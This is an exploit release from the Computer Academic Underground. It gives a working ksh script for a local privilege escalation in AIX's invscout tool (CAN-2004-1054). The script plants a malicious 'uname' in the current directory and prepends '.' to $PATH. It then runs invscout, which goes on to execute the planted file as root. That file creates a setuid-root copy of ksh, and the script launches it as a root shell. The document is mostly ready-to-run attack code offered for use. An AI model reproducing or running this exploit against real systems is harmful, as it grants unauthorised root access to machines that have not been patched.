____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2004-0004
Release Date:   2004.12.23
Title:          invscout-suidshell.sh
Description:    invscout exec() Chain Trusted $PATH SUID Shell Creation
Tested:         invscout on AIX 5.1.0
Attributes:     Privileged Access
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2004-0004.txt
Author/Email:   I)ruid <druid@caughq.org>
===============/========================================================

Description
===========

This script exploit writes out a simple shell script named 'uname' which
copies ksh, sets ownership to root, and sets the suit bit on it, thus
creating a suid shell.  The exploit then executes 'invscout' which in
turn executes 'lsvpd' without dropping privileges, which in turn
executes our 'uname' script using a modified $PATH environment variable.
Afterward it cleans up it's mess and executes the suid shell for
convenience.


Notes
=====

This exploit is written assuming your target shell is ksh.


Credits
=======

iDEFENSE Labs is credited with this discovery.


References
==========

http://www.idefense.com/application/poi/display?id=171
     &type=vulnerabilities
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1054


Exploit
=======

#!/usr/bin/ksh

#
#  invscout-suidshell.sh - I)ruid [CAU] (12.2004)
#
#  Exploits AIX's invscout tool which does not drop privs
#  prior to executing 'lsvpd' which in turn executes 'uname'
#  via trusted $PATH environment variable.
#

echo "Creating malicious 'uname'"
cat > ./uname << __EOF__
#!/usr/bin/ksh
cp /usr/bin/ksh ./ksh
chown root:system ./ksh
chmod 6755 ./ksh
__EOF__
chmod 700 ./uname

echo "Setting up malicious PATH environment"
export PATHSAVE=$PATH
export PATH=.:$PATH

# If we don't background this, the user must send
# a ctrl-c to proceed, which kills our script.
echo "Executing /usr/sbin/invscout"
/usr/sbin/invscout &

# Wait for invscout to finish/error
# You may have to adjust this value or execute
# the remainder of this script manually.
sleep 10

echo "Cleaning up our mess..."
rm ./uname
export PATH=$PATHSAVE
export PATHSAVE=

echo "Executing suid shell:"
./ksh